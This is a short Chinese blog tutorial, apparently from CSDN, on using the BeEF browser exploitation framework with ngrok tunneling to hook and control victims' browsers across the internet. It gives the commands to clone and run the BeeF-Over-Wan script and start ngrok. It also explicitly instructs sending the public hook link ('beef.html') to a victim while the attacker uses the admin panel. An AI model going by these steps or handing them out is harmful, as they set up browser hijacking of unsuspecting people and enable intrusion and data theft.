BeEF+ngrok实现内网穿透效果的主机控制

版权声明:本文为博主原创文章,转载请附上原文地址。 https://blog.csdn.net/nzjdsds/article/details/89598595

NGROK:https://bin.equinox.io

BeEFhttps://github.com/sdfzy/BeeF-Over-Wan

1.先去下载linux 版本的ngrok

2.zip压缩包放到/usr/local/bin目录下解压并配置 token

3.切换到/root/.ngrok2目录配置ngrok.yml文件

把BeEF需要监听的内容写入ngrok.yml

4.下载BeFF并执行

cd /usr/local/bin/ git clone https://github.com/sdfzy/BeeF-Over-Wan.git cd BeeF-Over-Wan/ chmod +x BeeFOverWan.py pip install termcolor python BeeFOverWan.py

选择:1

5.

另开一个终端 输入

ngrok start --all

我们需要把80的地址发给受害者,3000的地址是我们自己的管理页面

回到刚刚那个终端分别输入你的 攻击地址和你的管理地址(注意不要带http)

之后就会出现配置信息

6.

输入 http://9b68b422.ngrok.io/ui/authentication    就能打开管理页面

7.把攻击连接给受害者访问

http://de62b766.ngrok.io/beef.html

8.测试

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/89598595